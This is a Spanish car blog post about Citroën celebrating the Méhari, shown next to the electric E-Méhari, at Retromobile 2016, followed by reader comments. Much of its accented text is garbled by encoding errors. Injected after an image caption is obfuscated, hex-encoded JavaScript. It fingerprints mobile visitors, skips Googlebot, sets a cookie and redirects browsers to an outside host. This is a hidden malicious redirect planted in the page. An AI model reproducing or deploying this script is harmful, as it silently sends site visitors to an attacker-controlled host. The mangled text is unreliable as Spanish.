Retromobile 2016: CitroA�n celebra a la Mehari

vadeRetro
22402
Share on FacebookTweet about this on TwitterShare on Google+Print this pageEmail this to someone

8177_cl_68_008_007

Algunas marcas, especialmente las francesas, aprovechan Retromobile, la exposiciA?n bajo techo que se realiza anualmente en ParA�s, para revisar los libros de historia y celebrar por veces a sus modelos mA?s exitosos, o los mA?s innovadores, o los mA?s carismA?ticos.

En la ediciA?n 2016 de Retromobile que comienza el prA?ximo 3 de febrero y finaliza el 7, el modelo de la marca del doble chevron que tendrA? mayor exposiciA?n serA? el Mehari, que se exhibirA? junto al E-Mehari, un nuevo modelo elA�ctrico de CitroA�n que interpreta en clave moderna algunas de los rasgos caracterA�sticos del Mehari original.

36219

22384

En mayo de 1968, cuando toda una generaciA?n tomaba las calles de ParA�s reclamando mA?s libertad, CitroA�n presentA? el MA�hari, un descapotable atA�pico, fabricado sobre la plataforma del Dyane 6, que aterrizA? como un plato volador en los caminos de la A�poca. Su diseA�o sorprendente, fresco, sencillo y sin complejos, representA? toda una revoluciA?n en los cA?digos estA�ticos que definA�an tradicionalmente a los vehA�culos a cielo abierto.

Polivalente, prA?ctico y econA?mico, el CitroA�n MA�hari se convirtiA? en el compaA�ero ideal para hacer escapadas a travA�s del campo o hasta el borde del mar, gracias a su ingeniosa carrocerA�a de plA?stico ABS que limita su peso total hasta los 525 kg y lo hace insensible a la corrosiA?n y lavable con una simple manguera. Su modularidad fue una de las claves del A�xito de este CitroA�n, que destacA? por su originalidad y su simpatA�a.

El CitroA�n MA�hari pasA? a ser rA?pidamente un sA�mbolo de libertad y de una forma de vivir sencilla y relajada: todo un fenA?meno social. Este modelo tambiA�n hizo horas extra en el mundo del cine, en la popular serie de pelA�culas “El Gendarme”, protagonizadas por el actor Louis de FunA?s. AdemA?s, mostrA? sus prestaciones en pruebas exigentes como el Raid Lieja-Dakar-Lieja, en 1969, y el Raid ParA�s-Kabul-ParA�s, en 1970. Incluso vistiA? el uniforme del EjA�rcito FrancA�s y la GendarmerA�a Nacional del paA�s galo.

7752

23925

En Europa, la producciA?n del CitroA�n MA�hari, del que se fabricaron unas 145.000 unidades, se prolongA? durante casi dos dA�cadas, hasta 1987.

AdemA?s del MA�hari, el stand CitroA�n exhibe, con la colaboraciA?n de los clubes de coleccionistas de la marca, modelos histA?ricos que han entrado en la leyenda, como el C6, sA�mbolo de los aA�os 30, el Traction Avant, vehA�culo mA�tico del periodo de entreguerras, el 2 CV comercial, que celebra este aA�o su 65 aniversario, o el CX, modelo emblemA?tico de los aA�os 70.

2_CV_furgonvar _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

7 Comentarios, RSS

  1. morgan. 02/02/2016 @ 10:44 am

    no llevan un Ies Super America?

  2. Negro1983 02/02/2016 @ 1:50 pm

    Como me gusta el Mehari! hubo hasta versiones 4×4.

  3. Güilbeis 02/02/2016 @ 6:18 pm

    Voto por la del salvavidas inflable.

  4. astonmartin 05/02/2016 @ 2:28 am

    Sí, como me gusta esa belleza femenina que vista con ojos de hoy definiríamos como “vintage”.
    En cuanto al Mehari, una maravilla, de la época que en Citroen había buenas ideas.
    El E-Mehari, debo decirlo, no está nada mal.

  5. Javier M 07/02/2016 @ 10:51 am

    Afrodescendiente 1985 (Por motivos raciales en esta banda del rio está mal visto usar la palabra negro), la amarillita con el auxiliar sobre el capot es una 4×4, en la trasera derecha se le ve la transmisión.
    La del salvavidas tambien, o la de atrás.

    • Negro1983 01/03/2016 @ 4:23 pm

      jajaja, es con cariño lo de Negro, así me dicen por acá. Si me di cuenta que era 4×4, mi comentario fue mas una expresión de admiración, me gusta mucho. Hace poco me pude dar el gusto de comprar uno impecable, pero en escala 1:18.

  6. Beppe Viola 02/03/2016 @ 6:42 am

    En Artcurial de Paris, hace pocas semanas, se remataron una Mehari 4×4 del ’80 a € 50000 y un 2CV Sahara 4×4 bimotor del ’61 a € 175000… !!!!

Tu email no será publicado. Required fields are marked *

*


*